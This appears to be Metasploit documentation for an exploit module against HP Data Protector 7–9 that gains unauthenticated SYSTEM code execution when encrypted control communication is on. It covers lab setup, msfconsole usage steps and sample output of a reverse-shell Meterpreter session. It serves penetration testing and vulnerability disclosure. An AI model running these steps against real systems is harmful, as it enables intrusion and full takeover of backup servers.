HP Data Protector is an automated backup and recovery software for single-server to enterprise
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
and Linux operating systems.

While the server is using Encrypted Control Communication, HP Data Protector allows a remote
attacker to gain access without authentication, and gain arbitrary code execution under the
context of SYSTEM.


## Vulnerable Application

HP Data Protector versions 7, 8, and 9 are known to be affected.

This module was tested against version 9.0.0 on Windows 2008.

## Verification Steps

**Installing HP Data Protector**

Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).

After setting up the domain controller, double-click on the HP Data Protector installer, and you
should see this screen:

![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)

Click on **Install Data Protector**. And then the installer should ask you which installation type:

![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)

Make sure to select **Cell Manager**, and click **Next**. Use all default settings.

**Enabling Encrypted Communication**

After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
Data Protector GUI:

![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)

Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
right, click on that.

![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)

Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
sure that is checked. And then click **Apply**

**Using hp_dataprotector_encrypted_comms**

After the encrypted communication is enabled, you are ready to use
hp_dataprotector_encrypted_comms. Here is what you do:

1. Start msfconsole
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
3. Do: ```set RHOST [IP ADDRESS]```
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
5. Set other options as needed
6. Do: ```exploit```, and you should receive a session like the following:

```
msf exploit(hp_dataprotector_encrypted_comms) > run

[*] Started reverse TCP handler on 172.16.23.1:4444 
[*] 172.16.23.173:5555 - Initiating connection
[*] 172.16.23.173:5555 - Establishing encrypted channel
[*] 172.16.23.173:5555 - Sending payload
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
[*] Sending stage (957999 bytes) to 172.16.23.173
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

